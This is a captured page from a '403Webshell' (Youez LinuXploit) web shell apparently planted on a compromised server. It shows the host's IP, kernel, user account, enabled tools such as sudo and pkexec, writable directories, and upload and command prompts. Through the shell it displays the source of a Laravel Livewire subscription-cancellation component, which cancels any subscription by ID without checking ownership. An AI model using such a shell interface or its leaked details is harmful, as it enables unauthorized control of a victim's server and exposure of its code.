403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/lcmsmodels.com/public_html/app/Http/Livewire/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/lcmsmodels.com/public_html/app/Http/Livewire/UserSubscriptionsList.php
<?php

namespace App\Http\Livewire;

use App\Subscription;
use Livewire\Component;
use Livewire\WithPagination;


class UserSubscriptionsList extends Component
{
    use WithPagination;

    public $tab;

    protected $listeners = ['cancelSubscription'];

    public function mount()
    {
        $this->tab = 'Free';
    }

    public function tab($tab)
    {
        $this->resetPage();
        $this->tab = $tab;
    }

    public function confirmCancellation($subscriptionId)
    {
        $this->emit('swal-confirm', [
            'title' => __('general.areYouSureToCancel'),
            'message' => '',
            'emitEvent' => 'cancelSubscription',
            'parameter' => $subscriptionId,
        ]);
    }

    public function cancelSubscription($subscriptionId)
    {

        try {

            // find subscription
            $subscription = Subscription::findOrFail($subscriptionId);

            if ($subscription->gateway == 'Card') {

                // stripe client
                $stripe = new \Stripe\StripeClient(opt('STRIPE_SECRET_KEY', '123'));

                // cancel subscription
                $stripe->subscriptions->cancel($subscription->subscription_id, []);

                // update db
                $subscription->status = 'Canceled';
                $subscription->save();

                $this->emit('swal', [
                    'title' => __('general.cardRenewalCanceled'),
                    'message' => '',
                    'type' => 'info',
                ]);
            } elseif ($subscription->gateway == 'PayPal') {

                $this->emit('swal', [
                    'title' => __('general.paypalCancelMessage'),
                    'message' => '',
                    'type' => 'info',
                ]);

            } elseif($subscription->gateway == 'PayStack') {

                $this->emit('swal', [
                    'title' => __('v17.payStackCancelMessage'),
                    'message' => '',
                    'type' => 'info',
                ]);

            }else{

                $this->emit('swal', [
                    'title' => __('v17.invalidGatewayCancelMessage'),
                    'message' => '',
                    'type' => 'info',
                ]);

            }
        } catch (\Exception $e) {
            $this->emit('swal', [
                'title' => __('general.error'),
                'message' => $e->getMessage(),
                'type' => 'error',
            ]);
        }
    }

    public function render()
    {

        if ($this->tab == 'Free') {

            $subscribers = auth()->user()->followings()
                ->simplePaginate(opt('followListPerPage', 60));
        } elseif ($this->tab == 'Paid') {

            $subscribers = auth()->user()->subscriptions()->with('creator')
                ->where('subscription_expires', '>=', now())
                ->simplePaginate(opt('followListPerPage', 60));
        }

        return view('livewire.user-subscriptions-list')
            ->with('subscribers', $subscribers);
    }

    public function unfollow($userId)
    {
        // toggle follow
        auth()->user()->toggleFollow($userId);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit